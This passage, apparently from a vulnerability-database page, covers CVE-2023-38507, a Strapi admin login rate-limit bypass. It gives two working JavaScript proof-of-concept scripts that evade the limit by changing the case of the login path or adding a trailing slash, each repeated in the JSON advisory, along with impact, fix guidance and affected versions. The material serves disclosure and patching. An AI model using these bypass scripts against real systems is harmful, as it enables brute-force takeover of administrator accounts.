  const data1 = {
    email: "admin@strapi.com",   // registered e-mail address
    password: "invalid_password",
  };
  const data2 = {
    email: "admin@strapi.com",
    password: "RyG5z-CE2-]*4e4",   // correct password
  };

  for (let i = 0; i < 30; i++) {
    await fetch("http://localhost:1337/admin/login", {
      method: "POST",
      body: JSON.stringify(data1),
      headers: {
        "Content-Type": "application/json",
      },
    });
  }

  const res1 = await fetch("http://localhost:1337/admin/login", {
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res1.status + " " + res1.statusText);

  const res2 = await fetch("http://localhost:1337/admin/Login", {  // capitalize part of path
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res2.status + " " + res2.statusText);
})();

This PoC does the following:

Request 30 incorrect logins.
Execute the same request again and confirm that it is blocked by rate limit from the console screen. (429 Too Many Requests)
Next, falsify the pathname of the request (/admin/Login) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK)

Pattern 2 (trailing slash)

// poc.js
(async () => {
  const data1 = {
    email: "admin@strapi.com",   // registered e-mail address
    password: "invalid_password",
  };
  const data2 = {
    email: "admin@strapi.com",
    password: "RyG5z-CE2-]*4e4",   // correct password
  };

  for (let i = 0; i < 30; i++) {
    await fetch("http://localhost:1337/admin/login", {
      method: "POST",
      body: JSON.stringify(data1),
      headers: {
        "Content-Type": "application/json",
      },
    });
  }

  const res1 = await fetch("http://localhost:1337/admin/login", {
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res1.status + " " + res1.statusText);

  const res2 = await fetch("http://localhost:1337/admin/login/", {  // trailing slash
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res2.status + " " + res2.statusText);
})();

This PoC does the following:

Request 30 incorrect logins.
Execute the same request again and confirm that it is blocked by rate limit from the console screen. (429 Too Many Requests)
Next, falsify the pathname of the request (/admin/login/) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK)

PoC Video

PoC Video

4. Impact

It is possible to bypass the rate limit of the login function of the admin screen. Therefore, the possibility of unauthorized login by login brute force attack increases.

5. Measures

Forcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (ctx.request.path)
Also, remove any extra slashes in the request path.

https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31

6. References

Severity ?

7.3 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@strapi/admin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.12.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@strapi/plugin-users-permissions"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.12.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-38507"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-09-13T16:32:26Z",
    "nvd_published_at": "2023-09-15T20:15:08Z",
    "severity": "HIGH"
  },
  "details": "### 1. Summary\nThere is a rate limit on the login function of Strapi\u0027s admin screen, but it is possible to circumvent it.\n\n### 2. Details\nIt is possible to avoid this by modifying the rate-limited request path as follows.\n1. Manipulating request paths to upper or lower case. (Pattern 1)\n   - In this case, avoidance is possible with various patterns.\n2. Add path slashes to the end of the request path. (Pattern 2)\n\n### 3. PoC\nAccess the administrator\u0027s login screen (`/admin/auth/login`) and execute the following PoC on the browser\u0027s console screen.\n\n#### Pattern 1 (uppercase and lowercase)\n```js\n// poc.js\n(async () =\u003e {\n  const data1 = {\n    email: \"admin@strapi.com\",   // registered e-mail address\n    password: \"invalid_password\",\n  };\n  const data2 = {\n    email: \"admin@strapi.com\",\n    password: \"RyG5z-CE2-]*4e4\",   // correct password\n  };\n\n  for (let i = 0; i \u003c 30; i++) {\n    await fetch(\"http://localhost:1337/admin/login\", {\n      method: \"POST\",\n      body: JSON.stringify(data1),\n      headers: {\n        \"Content-Type\": \"application/json\",\n      },\n    });\n  }\n\n  const res1 = await fetch(\"http://localhost:1337/admin/login\", {\n    method: \"POST\",\n    body: JSON.stringify(data2),\n    headers: {\n      \"Content-Type\": \"application/json\",\n    },\n  });\n  console.log(res1.status + \" \" + res1.statusText);\n\n  const res2 = await fetch(\"http://localhost:1337/admin/Login\", {  // capitalize part of path\n    method: \"POST\",\n    body: JSON.stringify(data2),\n    headers: {\n      \"Content-Type\": \"application/json\",\n    },\n  });\n  console.log(res2.status + \" \" + res2.statusText);\n})();\n```\n\n##### This PoC does the following:\n1. Request 30 incorrect logins.\n4. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`)\n5. Next, falsify the pathname of the request (**`/admin/Login`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`)\n\n#### Pattern 2 (trailing slash)\n```js\n// poc.js\n(async () =\u003e {\n  const data1 = {\n    email: \"admin@strapi.com\",   // registered e-mail address\n    password: \"invalid_password\",\n  };\n  const data2 = {\n    email: \"admin@strapi.com\",\n    password: \"RyG5z-CE2-]*4e4\",   // correct password\n  };\n\n  for (let i = 0; i \u003c 30; i++) {\n    await fetch(\"http://localhost:1337/admin/login\", {\n      method: \"POST\",\n      body: JSON.stringify(data1),\n      headers: {\n        \"Content-Type\": \"application/json\",\n      },\n    });\n  }\n\n  const res1 = await fetch(\"http://localhost:1337/admin/login\", {\n    method: \"POST\",\n    body: JSON.stringify(data2),\n    headers: {\n      \"Content-Type\": \"application/json\",\n    },\n  });\n  console.log(res1.status + \" \" + res1.statusText);\n\n  const res2 = await fetch(\"http://localhost:1337/admin/login/\", {  // trailing slash\n    method: \"POST\",\n    body: JSON.stringify(data2),\n    headers: {\n      \"Content-Type\": \"application/json\",\n    },\n  });\n  console.log(res2.status + \" \" + res2.statusText);\n})();\n```\n\n##### This PoC does the following:\n1. Request 30 incorrect logins.\n2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`)\n3. Next, falsify the pathname of the request (**`/admin/login/`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`)\n\n\n\n#### PoC Video\n- [PoC Video](https://drive.google.com/file/d/1UHyt6UDpl28CXjltVJmqDvSEkkJIexiB/view?usp=share_link)\n\n### 4. Impact\nIt is possible to bypass the rate limit of the login function of the admin screen. \nTherefore, the possibility of unauthorized login by login brute force attack increases.\n\n### 5. Measures\nForcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (`ctx.request.path`)   \nAlso, remove any extra slashes in the request path.\n\nhttps://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31\n\n### 6. References\n- [OWASP: API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)\n- [OWASP: Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html)\n- [OWASP: Denial of Service Cheat Sheet (Rate limiting)](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html#rate-limiting)",
  "id": "GHSA-24q2-59hm-rh9r",
  "modified": "2023-09-13T16:32:26Z",
  "published": "2023-09-13T16:32:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38507"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/strapi/strapi"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Strapi Improper Rate Limiting vulnerability"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2023-38507 (GCVE-0-2023-38507)

GSD-2023-38507

FKIE_CVE-2023-38507

GHSA-24Q2-59HM-RH9R

1. Summary

2. Details

3. PoC

Pattern 1 (uppercase and lowercase)

This PoC does the following:

Pattern 2 (trailing slash)

This PoC does the following:

PoC Video

4. Impact

5. Measures

6. References

Tags

Sightings

Nomenclature